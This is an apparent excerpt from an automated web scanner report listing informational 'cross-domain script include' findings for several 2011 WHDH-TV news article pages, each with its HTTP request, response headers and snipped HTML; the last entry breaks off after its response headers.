  • http://platform.twitter.com/widgets.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://www.google.com/jsapi

Request

GET /news/articles/national/12003352445114/brain-fluid-buildup-delays-full-rehab-for-giffords/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:55:29 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=13107
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 01:33:06 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 20085
Via: 1.1 dfw107002 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV - Brain fluid buildup delays full rehab for Giffords</title>
<meta name="pub
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

21.1540. http://www1.whdh.com/news/articles/national/12003355844126/case-in-giffords-shooting-likely-to-take-years/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /news/articles/national/12003355844126/case-in-giffords-shooting-likely-to-take-years/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://platform.twitter.com/widgets.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://www.google.com/jsapi

Request

GET /news/articles/national/12003355844126/case-in-giffords-shooting-likely-to-take-years/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:55:19 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 6
Cache-Control: max-age=990
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Mon, 24 Jan 2011 22:11:00 GMT
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 dfw107017 (MII-APC/1.6)
Content-Length: 23703
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV - Case in Giffords shooting likely to take years</title>
<meta name="publish
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

21.1541. http://www1.whdh.com/news/articles/national/12003357037177/bitter-cold-hits-northeast-closing-some-schools/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /news/articles/national/12003357037177/bitter-cold-hits-northeast-closing-some-schools/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://platform.twitter.com/widgets.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://www.google.com/jsapi

Request

GET /news/articles/national/12003357037177/bitter-cold-hits-northeast-closing-some-schools/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:55:40 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=11609
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 01:08:21 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 20973
Via: 1.1 dfw107007 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV - Bitter cold hits Northeast, closing some schools</title>
<meta name="publi
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

21.1542. http://www1.whdh.com/news/articles/national/12003357495381/fired-over-facebook-companies-cracking-down/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /news/articles/national/12003357495381/fired-over-facebook-companies-cracking-down/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://platform.twitter.com/widgets.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://www.google.com/jsapi

Request

GET /news/articles/national/12003357495381/fired-over-facebook-companies-cracking-down/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:55:36 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=16559
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 02:30:46 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 23665
Via: 1.1 dfw107007 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV - Fired over Facebook: Companies cracking down</title>
<meta name="publisher
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

21.1543. http://www1.whdh.com/news/articles/national/12003358186615/police-man-kills-2-fla-officers-in-firefight/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /news/articles/national/12003358186615/police-man-kills-2-fla-officers-in-firefight/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://platform.twitter.com/widgets.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://www.google.com/jsapi

Request

GET /news/articles/national/12003358186615/police-man-kills-2-fla-officers-in-firefight/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:55:34 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=37938
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 08:27:02 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 21568
Via: 1.1 dfw107010 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV - Police: Man kills 2 Fla. officers in firefight</title>
<meta name="publish
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

21.1544. http://www1.whdh.com/news/articles/national/12003358216360/biden-called-for-jury-duty-in-del-but-dismissed/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /news/articles/national/12003358216360/biden-called-for-jury-duty-in-del-but-dismissed/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://platform.twitter.com/widgets.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://www.google.com/jsapi

Request

GET /news/articles/national/12003358216360/biden-called-for-jury-duty-in-del-but-dismissed/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:55:35 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=39023
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 08:45:09 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 19004
Via: 1.1 dfw107017 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV - Biden called for jury duty in Del., but dismissed</title>
<meta name="publ
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

21.1545. http://www1.whdh.com/news/articles/national/12003359522816/fbi-woman-confessed-to-snatching-ny-baby-in-1987/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /news/articles/national/12003359522816/fbi-woman-confessed-to-snatching-ny-baby-in-1987/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://platform.twitter.com/widgets.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://www.google.com/jsapi

Request

GET /news/articles/national/12003359522816/fbi-woman-confessed-to-snatching-ny-baby-in-1987/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:55:36 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 2
Cache-Control: max-age=38587
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 08:37:54 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 23504
Via: 1.1 dfw107002 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV - FBI: Woman confessed to snatching NY baby in 1987</title>
<meta name="publ
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

21.1546. http://www1.whdh.com/news/articles/national/12003359544568/suspect-faces-judge-in-deadly-arizona-shooting/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /news/articles/national/12003359544568/suspect-faces-judge-in-deadly-arizona-shooting/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://platform.twitter.com/widgets.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://www.google.com/jsapi

Request

GET /news/articles/national/12003359544568/suspect-faces-judge-in-deadly-arizona-shooting/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:55:25 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=43145
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 09:53:40 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 23105
Via: 1.1 dfw107010 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV - Suspect faces judge in deadly Arizona shooting</title>
<meta name="publish
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

21.1547. http://www1.whdh.com/news/articles/national/12003359566674/fbi-nc-mom-of-kidnapped-ny-child-is-held-in-conn/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /news/articles/national/12003359566674/fbi-nc-mom-of-kidnapped-ny-child-is-held-in-conn/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://platform.twitter.com/widgets.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://www.google.com/jsapi

Request

GET /news/articles/national/12003359566674/fbi-nc-mom-of-kidnapped-ny-child-is-held-in-conn/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:55:20 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 14
Cache-Control: max-age=39036
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 08:45:06 GMT
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 dfw107007 (MII-APC/1.6)
Content-Length: 19321
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV - FBI: NC mom of kidnapped NY child is held in Conn.</title>
<meta name="pub
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

21.1548. http://www1.whdh.com/news/articles/national/12003359579087/air-force-chief-pleads-guilty-to-sexual-misconduct/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /news/articles/national/12003359579087/air-force-chief-pleads-guilty-to-sexual-misconduct/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://platform.twitter.com/widgets.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://www.google.com/jsapi

Request

GET /news/articles/national/12003359579087/air-force-chief-pleads-guilty-to-sexual-misconduct/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:55:35 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=37305
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 08:16:31 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 20650
Via: 1.1 dfw107010 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV - Air Force chief pleads guilty to sexual misconduct</title>
<meta name="pub
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

21.1549. http://www1.whdh.com/news/articles/national/12003359712183/cousin-woman-facing-kidnap-charge-looked-pregnant/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /news/articles/national/12003359712183/cousin-woman-facing-kidnap-charge-looked-pregnant/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://platform.twitter.com/widgets.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://www.google.com/jsapi

Request

GET /news/articles/national/12003359712183/cousin-woman-facing-kidnap-charge-looked-pregnant/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:55:37 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=38915
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 08:43:22 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 20553
Via: 1.1 dfw107022 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV - Cousin: Woman facing kidnap charge looked pregnant</title>
<meta name="pub
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

21.1550. http://www1.whdh.com/news/articles/national/12003359875374/suspect-pleads-not-guilty-in-deadly-ariz-shooting/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /news/articles/national/12003359875374/suspect-pleads-not-guilty-in-deadly-ariz-shooting/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://platform.twitter.com/widgets.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://www.google.com/jsapi

Request

GET /news/articles/national/12003359875374/suspect-pleads-not-guilty-in-deadly-ariz-shooting/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:54:15 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 67
Cache-Control: max-age=40061
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 09:01:06 GMT
Content-Type: text/html; charset=ISO-8859-1
Via: 1.1 dfw107005 (MII-APC/1.6)
Content-Length: 19505
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV - Suspect pleads not guilty in deadly Ariz. shooting</title>
<meta name="pub
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

21.1551. http://www1.whdh.com/news/articles/politics/12003200196967/mass-gov-patrick-sworn-in-for-second-term/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /news/articles/politics/12003200196967/mass-gov-patrick-sworn-in-for-second-term/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://platform.twitter.com/widgets.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://www.google.com/jsapi

Request

GET /news/articles/politics/12003200196967/mass-gov-patrick-sworn-in-for-second-term/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:56:49 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=43085
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 09:54:04 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 37553
Via: 1.1 dfw107007 (MII-APC/1.6)
Connection: close

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html>
<head>
<title>WHDH-TV - Mass. Gov. Patrick sworn-in for second term</title>
<meta name="publisher"
...[SNIP]...
<link rel="stylesheet" type="text/css" href="http://www1.whdh.com/js/jq/jquery.ui/css/test/jquery-ui-1.7.2.custom.css" media="all" /><script src="http://www.google.com/jsapi"></script>
...[SNIP]...
</a><script type="text/javascript" src="http://platform.twitter.com/widgets.js"></script>
...[SNIP]...
</a><script src="http://static.ak.fbcdn.net/connect.php/js/FB.Share" type="text/javascript"></script>
...[SNIP]...

21.1552. http://www1.whdh.com/news/articles/sports/12003352258818/packers-beat-bears-21-14-to-win-nfc-title/

Summary

Severity:   Information
Confidence:   Certain
Host:   http://www1.whdh.com
Path:   /news/articles/sports/12003352258818/packers-beat-bears-21-14-to-win-nfc-title/

Issue detail

The response dynamically includes the following scripts from other domains:
  • http://platform.twitter.com/widgets.js
  • http://static.ak.fbcdn.net/connect.php/js/FB.Share
  • http://www.google.com/jsapi

Request

GET /news/articles/sports/12003352258818/packers-beat-bears-21-14-to-win-nfc-title/ HTTP/1.1
Host: www1.whdh.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: ACC1TAB=1; __utmz=208585492.1295906131.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=208585492.509901533.1295906131.1295906131.1295906131.1; WHDHSTR=d2c1b5275a3ff835402a31251d91c0c5; __utmc=208585492; __utmb=208585492.1.10.1295906131;

Response

HTTP/1.1 200 OK
Date: Mon, 24 Jan 2011 21:56:14 GMT
Server: Apache/2.0.46 (Red Hat)
Accept-Ranges: bytes
X-Powered-By: PHP/4.3.2
Cache-Control: must-revalidate
Age: 0
Cache-Control: max-age=10283
Via: HTTP/1.1 www1.whdh.com (MII-WSD/1.4)
X-Pb-Mii: Powered by Mirror Image Internet
Expires: Tue, 25 Jan 2011 00:46:49 GMT
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 23145
Via: 1.1 dfw107010 (MII-APC/1.6)
Connection: close

